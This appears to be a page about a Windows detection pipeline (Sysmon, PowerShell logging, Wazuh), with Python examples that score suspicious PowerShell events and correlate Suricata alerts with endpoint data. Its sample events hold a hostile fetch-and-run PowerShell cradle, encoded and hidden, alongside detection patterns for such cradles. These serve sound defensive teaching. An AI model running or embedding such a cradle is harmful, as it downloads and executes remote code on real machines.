// every alert starts as behavior

Architecture

From endpoint behavior to analyst-ready detection. DetectionHunter visualizes how Windows activity is logged, enriched with Sysmon, collected by Wazuh, matched against detection rules, and reviewed by analysts to continuously improve defensive visibility.

attack-to-alert rail · live
Endpoint · behavior
● Alert · HIGH
Suspicious PowerShell Behavior
technique: T1059.001
source: windows endpoint
status: needs review
Endpoint → Event Logs → PowerShell → Sysmon → Wazuh Agent → Wazuh Manager → Detection Rules → Alert → Analyst

Pipeline layers

behavior → signal → decision
layer 01
Endpoint Layer

Windows workstations and servers where behavior originates — processes, logons, scripts, file and network activity.

layer 02
Logging Layer

Native Windows channels record activity: Security 4688 process creation (only when the Audit Process Creation subcategory is on, and the command line is included only if the "Include command line in process creation events" policy is also enabled), 4624/4625 logon success and failure, plus System and Application events.

layer 03
PowerShell Behavior Layer

The Microsoft-Windows-PowerShell/Operational channel records what the engine actually ran: 4104 script block logging captures the decoded text of an -EncodedCommand and each layer an obfuscated script unwraps into before it executes, and 4103 module logging captures pipeline and parameter detail. Full coverage needs the "Turn on PowerShell Script Block Logging" and "Turn on Module Logging" policies; without them, Windows PowerShell 5 still records only blocks containing known-suspicious keywords, at Warning level.

layer 04
Sysmon Enrichment Layer

Sysmon Event ID 1 adds the parent process, full command line, file hashes, image path and user context to every process start, and Event ID 3 records the network connections a process makes. What Sysmon records is governed by its configuration, so the Sysmon ruleset decides which of these fields ever reach the pipeline.

layer 05
Wazuh Collection Layer

The Wazuh agent reads the Security, Sysmon and PowerShell channels through eventchannel localfile entries in its ossec.conf and forwards each event to the manager rendered as JSON (win.system and win.eventdata); decoding those fields into what the rules match on happens on the manager.

layer 06
Detection Rules Layer

Decoders parse each event into fields; rules match on those fields and assign a level from 0 to 15, and the manager writes an alert for every match at or above its alert threshold (level 3 by default). The rule level is what separates noise from suspicious behavior.

layer 07
Alert Layer

A suspicious match becomes an analyst-ready alert with technique mapping, severity, source, and status.

layer 08
Analyst Review Layer

Triage the alert: validate evidence, confirm scope, decide on response, and capture findings.

layer 09
Improvement Layer

Review feeds back into rule tuning, telemetry gaps, and new detections. Detection engineering is continuous.

// focus view

PowerShell · T1059.001

A single suspicious PowerShell invocation traced from execution through Windows logging, PowerShell script block capture, Sysmon enrichment, Wazuh rule match, alert generation, and analyst review.

  01 · Execution
     powershell.exe -EncodedCommand …
  02 · Windows 4688
     Process created — parent: winword.exe
  03 · PowerShell 4104
     Script block: Invoke-Expression (DownloadString …)
  04 · Sysmon EID 1 / EID 3
     Hash · CLI · ParentImage · User (EID 1) · Network connection (EID 3)
  05 · Wazuh Rule
     match: suspicious_powershell_execution
  06 · Alert
     T1059.001 · High · status: needs review
  07 · Analyst
     Validate cmdline, user, host, timestamp → tune
● Alert · severity: HIGH
Suspicious PowerShell Execution
technique: T1059.001 — Command and Scripting Interpreter: PowerShell
telemetry: 4688 · 4104 · Sysmon EID 1
detection: wazuh rule match
source: windows endpoint
analyst task: review command line, parent process, user, host, timestamp
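The decision step that the pipeline layers and the focus view describe, as an added Python example that is not DetectionHunter's or Wazuh's code: it scores a Sysmon EID 1 or PowerShell 4104 event for T1059.001 indicators, decodes the -EncodedCommand payload the way powershell.exe would read it, and emits the alert record the analyst sees. The event shape follows Wazuh's eventchannel JSON (win.system / win.eventdata with camelCase keys); the rule name, indicator weights, level-to-severity mapping, alert threshold and all three sample events are assumptions constructed for this example.

```python
import base64
import re

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Checked against the command line plus the decoded -EncodedCommand payload (EID 1)
# or the script block text (4104). Weights are assumptions for this example.
INDICATORS = [
    ("invoke_expression", re.compile(r"(?i)\b(iex|invoke-expression)\b"), 4),
    ("download_cradle", re.compile(r"(?i)\b(downloadstring|downloadfile|invoke-webrequest|iwr)\b"), 4),
    ("base64_decode", re.compile(r"(?i)frombase64string"), 2),
    ("hidden_window", re.compile(r"(?i)-w(indowstyle)?\s+hidden"), 2),
    ("no_profile", re.compile(r"(?i)(^|\s)-nop(rofile)?\b"), 1),
]
ENCODED_WEIGHT, OFFICE_PARENT_WEIGHT = 4, 5
ALERT_LEVEL = 6  # Wazuh-style 0-15 level; anything lower is dropped as noise

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_encoded_switch(token):
    """powershell.exe accepts -ec or any prefix of -EncodedCommand from -e upward."""
    if not token.startswith(("-", "/")):
        return False
    key = token[1:].lower()
    return key == "ec" or (bool(key) and "encodedcommand".startswith(key))

def decode_encoded_command(command_line):
    """Payload of -EncodedCommand (base64 of UTF-16LE) as text, or None."""
    tokens = command_line.split()
    for switch, blob in zip(tokens, tokens[1:]):
        if is_encoded_switch(switch):
            blob = blob.strip("\"'")
            try:
                return base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # switch present but payload not decodable
    return None

def evaluate(event):
    """Return an alert dict for a suspicious PowerShell event, or None for noise."""
    system, data = event["win"]["system"], event["win"]["eventdata"]
    channel, eid = system["channel"], str(system["eventID"])
    hits, points, decoded = [], 0, None
    if channel == "Microsoft-Windows-Sysmon/Operational" and eid == "1":
        if basename(data.get("image", "")) not in POWERSHELL_IMAGES:
            return None
        cmdline = data.get("commandLine", "")
        if any(is_encoded_switch(t) for t in cmdline.split()):
            decoded = decode_encoded_command(cmdline)
            hits.append("encoded_command" if decoded is not None else "undecodable_encoded_command")
            points += ENCODED_WEIGHT
        if basename(data.get("parentImage", "")) in OFFICE_PARENTS:
            hits.append("office_parent")
            points += OFFICE_PARENT_WEIGHT
        text = cmdline + "\n" + (decoded or "")
    elif channel == "Microsoft-Windows-PowerShell/Operational" and eid == "4104":
        text = data.get("scriptBlockText", "")
    else:
        return None
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            hits.append(name)
            points += weight
    level = min(points, 15)
    if level < ALERT_LEVEL:
        return None
    return {"rule": "suspicious_powershell_execution", "technique": "T1059.001",
            "level": level, "severity": "HIGH" if level >= 12 else "MEDIUM" if level >= 8 else "LOW",
            "source": f"{system.get('computer', '?')} {channel}:{eid}",
            "user": data.get("user"), "parent": data.get("parentImage"),
            "indicators": hits, "decoded_command": decoded, "status": "needs review"}

def encode_command(script):
    """Build an -EncodedCommand argument the way powershell.exe expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events: an Office-spawned encoded cradle, its 4104 script block, and a benign run.
SAMPLE_EVENTS = [
    {"win": {"system": {"channel": "Microsoft-Windows-Sysmon/Operational", "eventID": "1", "computer": "WS01"},
             "eventdata": {"image": PS_EXE, "user": r"CORP\alice",
                           "commandLine": "powershell.exe -nop -w hidden -EncodedCommand " + encode_command(CRADLE),
                           "parentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"}}},
    {"win": {"system": {"channel": "Microsoft-Windows-PowerShell/Operational", "eventID": "4104", "computer": "WS01"},
             "eventdata": {"scriptBlockText": CRADLE, "path": ""}}},
    {"win": {"system": {"channel": "Microsoft-Windows-Sysmon/Operational", "eventID": "1", "computer": "SRV02"},
             "eventdata": {"image": PS_EXE, "user": r"NT AUTHORITY\SYSTEM",
                           "commandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
                           "parentImage": r"C:\Windows\System32\svchost.exe"}}},
]

def run_samples():
    return [evaluate(e) for e in SAMPLE_EVENTS]
```

Run `run_samples()`: the Office-spawned encoded cradle reaches level 15 (HIGH) with the decoded command attached for the analyst, the 4104 script block alone scores MEDIUM, and the scheduled backup script produces nothing. A real Wazuh rule expresses the same matching in XML against the decoded fields; the point of scoring per indicator rather than on a single regex is that the analyst's tuning step can adjust one weight without rewriting the rule.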
// secondary path · network visibility
Suricata → eve.json → Wazuh ingest → Network alert → Correlation w/ endpoint
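The correlation step of the secondary path, as an added Python example that is not DetectionHunter's or Wazuh's code: Suricata alerts read from eve.json are joined to Sysmon EID 3 network-connection events on the connection tuple and a time window, so the network alert carries the host, process and user that made the connection. The eve.json keys (event_type, src_ip, dest_ip, alert.signature) are Suricata's own and the Sysmon field names follow Wazuh's camelCase rendering; the 30-second window, the local signature ids and texts, and all records are constructed for this example.

```python
import json
from datetime import datetime, timedelta, timezone

WINDOW = timedelta(seconds=30)  # assumed tolerance for clock skew and flow start vs. alert time

def parse_eve_time(stamp):
    # Suricata eve.json timestamps look like 2024-05-02T10:15:21.104000+0000
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%S.%f%z")

def parse_sysmon_time(stamp):
    # Sysmon UtcTime looks like 2024-05-02 10:15:20.987 and is always UTC
    return datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S.%f").replace(tzinfo=timezone.utc)

def closest(candidates, when, window):
    """Sysmon event nearest in time to `when`, or None if none lies inside the window."""
    best = min(((abs(t - when), ev) for t, ev in candidates), key=lambda c: c[0], default=None)
    return best[1] if best is not None and best[0] <= window else None

def correlate(eve_lines, sysmon_eid3, window=WINDOW):
    """Attach endpoint process context to each Suricata alert.

    exact: same src ip/port and dst ip/port.  weak: same src ip, dst ip and dst port
    only (the process behind a sibling connection).  None: no EID 3 at all, which
    is a telemetry gap the improvement layer should pick up."""
    by_tuple, by_triple = {}, {}
    for ev in sysmon_eid3:
        t = parse_sysmon_time(ev["utcTime"])
        src, dst, dport = ev["sourceIp"], ev["destinationIp"], int(ev["destinationPort"])
        by_tuple.setdefault((src, int(ev["sourcePort"]), dst, dport), []).append((t, ev))
        by_triple.setdefault((src, dst, dport), []).append((t, ev))
    results = []
    for line in eve_lines:
        rec = json.loads(line)
        if rec.get("event_type") != "alert":
            continue  # flow/dns/http records are context, not alerts
        when = parse_eve_time(rec["timestamp"])
        quality = "exact"
        ev = closest(by_tuple.get((rec["src_ip"], rec["src_port"], rec["dest_ip"], rec["dest_port"]), []), when, window)
        if ev is None:
            quality = "weak"
            ev = closest(by_triple.get((rec["src_ip"], rec["dest_ip"], rec["dest_port"]), []), when, window)
        if ev is None:
            quality = None
        results.append({
            "signature": rec["alert"]["signature"], "suricata_severity": rec["alert"]["severity"],
            "src": f"{rec['src_ip']}:{rec['src_port']}", "dst": f"{rec['dest_ip']}:{rec['dest_port']}",
            "match": quality,
            "host": ev["host"] if ev else None, "image": ev["image"] if ev else None,
            "pid": ev["processId"] if ev else None, "user": ev["user"] if ev else None,
            "note": None if ev else "no Sysmon EID 3 for this flow: check agent and Sysmon coverage on src_ip",
        })
    return results

# Constructed eve.json lines: signature ids sit in the local 1000000+ range and are made up.
EVE_LINES = [
    json.dumps({"timestamp": "2024-05-02T10:15:21.104000+0000", "event_type": "alert", "proto": "TCP",
                "src_ip": "10.0.0.5", "src_port": 49812, "dest_ip": "203.0.113.7", "dest_port": 80,
                "alert": {"signature_id": 1000001, "signature": "LOCAL PowerShell user-agent to external host", "severity": 2}}),
    json.dumps({"timestamp": "2024-05-02T10:15:40.000000+0000", "event_type": "alert", "proto": "TCP",
                "src_ip": "10.0.0.5", "src_port": 50110, "dest_ip": "203.0.113.7", "dest_port": 80,
                "alert": {"signature_id": 1000002, "signature": "LOCAL script download over HTTP", "severity": 1}}),
    json.dumps({"timestamp": "2024-05-02T10:15:22.000000+0000", "event_type": "flow", "proto": "TCP",
                "src_ip": "10.0.0.5", "src_port": 49812, "dest_ip": "203.0.113.7", "dest_port": 80}),
    json.dumps({"timestamp": "2024-05-02T10:17:03.500000+0000", "event_type": "alert", "proto": "TCP",
                "src_ip": "10.0.0.77", "src_port": 51234, "dest_ip": "203.0.113.7", "dest_port": 80,
                "alert": {"signature_id": 1000001, "signature": "LOCAL PowerShell user-agent to external host", "severity": 2}}),
]

# Constructed Sysmon EID 3 records as Wazuh renders them; host taken from win.system.computer.
SYSMON_EID3 = [
    {"host": "WS01", "utcTime": "2024-05-02 10:15:20.987", "processId": "4120", "user": r"CORP\alice",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "sourceIp": "10.0.0.5", "sourcePort": "49812", "destinationIp": "203.0.113.7", "destinationPort": "80"},
    {"host": "WS02", "utcTime": "2024-05-02 10:15:30.000", "processId": "7788", "user": r"CORP\bob",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "sourceIp": "10.0.0.9", "sourcePort": "51000", "destinationIp": "198.51.100.20", "destinationPort": "443"},
]

def run_samples():
    return correlate(EVE_LINES, SYSMON_EID3)
```

`run_samples()` returns three correlated alerts: the first is an exact tuple match naming powershell.exe on WS01, the second is a weak match on a later connection from the same host to the same destination, and the third has no endpoint record at all, which is the signal that 10.0.0.77 is missing Sysmon or agent coverage. The flow record is skipped because only event_type "alert" is a detection.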

Detection engineering turns raw behavior into defensive clarity.